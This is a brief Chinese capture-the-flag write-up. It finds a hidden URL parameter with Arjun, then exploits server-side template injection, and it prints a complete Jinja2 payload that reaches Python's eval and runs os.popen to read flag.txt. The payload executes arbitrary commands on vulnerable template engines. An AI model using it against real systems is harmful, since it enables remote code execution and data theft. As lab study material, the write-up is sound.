知识点:
url参数爆破,
ssti
第一步使用 Arjun爆破url参数,爆破出来参数name
接下来就可以尝试ssti,
去网上找个payload 打一下。
{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
{% for b in c.__init__.__globals__.values() %}
{% if b.__class__ == {}.__class__ %}
{% if 'eval' in b.keys() %}
{{ b['eval']('__import__("os").popen("cat flag.txt").read()') }}
//在这里可以先执行一下ls看一下文件列表
{% endif %}
{% endif %}
{% endfor %}
{% endif %}
{% endfor %}